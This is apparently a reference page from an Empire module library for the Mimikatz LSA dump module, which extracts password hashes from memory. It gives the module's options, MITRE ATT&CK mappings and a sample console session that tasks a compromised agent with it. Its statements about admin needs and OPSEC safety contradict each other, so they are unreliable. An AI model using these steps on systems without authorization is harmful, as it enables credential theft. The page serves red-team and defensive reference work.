Invoke-Mimikatz LSA Dump - Empire Module


This page contains detailed information about how to use the powershell/credentials/mimikatz/lsadump Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Invoke-Mimikatz LSA Dump
Module: powershell/credentials/mimikatz/lsadump
Source code [1]: empire/server/modules/powershell/credentials/mimikatz/lsadump.yaml
Source code [2]: empire/server/modules/powershell/credentials/mimikatz/lsadump.py
MITRE ATT&CK: T1098, T1003, T1081, T1207, T1075, T1097, T1145, T1101, T1178, S0002
Language: PowerShell
Needs admin: Yes
OPSEC safe: Yes
Background: Yes

The lsadump module runs PowerSploit's Invoke-Mimikatz function to extract a particular user hash from memory. Useful on domain controllers.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the lsadump module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options


This is a list of options that are required by the lsadump module:

Agent
Agent to run module on.

Additional Module Options


This is a list of additional options that are supported by the lsadump module:

Username
Username to extract the hash for, blank for all local passwords.

Lsadump Example Usage


Here's an example of how to use the lsadump module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/credentials/mimikatz/lsadump

 Author       @JosephBialek                                                       
              @gentilkiwi                                                         
 Background   True                                                                
 Comments     http://clymb3r.wordpress.com/                                       
              http://blog.gentilkiwi.com                                          
              https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#lsa    
 Description  Runs PowerSploit's Invoke-Mimikatz function to extract a particular 
              user hash from memory. Useful on domain controllers.                
 Language     powershell                                                          
 Name         powershell/credentials/mimikatz/lsadump                             
 NeedsAdmin   True                                                                
 OpsecSafe    True                                                                
 Software     http://attack.mitre.org/software/S0002                              
 Techniques   http://attack.mitre.org/techniques/T1098                            
              http://attack.mitre.org/techniques/T1003                            
              http://attack.mitre.org/techniques/T1081                            
              http://attack.mitre.org/techniques/T1207                            
              http://attack.mitre.org/techniques/T1075                            
              http://attack.mitre.org/techniques/T1097                            
              http://attack.mitre.org/techniques/T1145                            
              http://attack.mitre.org/techniques/T1101                            
              http://attack.mitre.org/techniques/T1178                            


,Record Options----,----------,-----------------------------------,
| Name     | Value | Required | Description                       |
|----------|-------|----------|-----------------------------------|
| Agent    |       | True     | Agent to run module on.           |
|----------|-------|----------|-----------------------------------|
| Username |       | False    | Username to extract the hash for, |
|          |       |          | blank for all local passwords.    |
'----------'-------'----------'-----------------------------------'

(Empire: usemodule/powershell/credentials/mimikatz/lsadump) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/credentials/mimikatz/lsadump) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Authors


References


See Also


Check also the following modules related to this module:

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.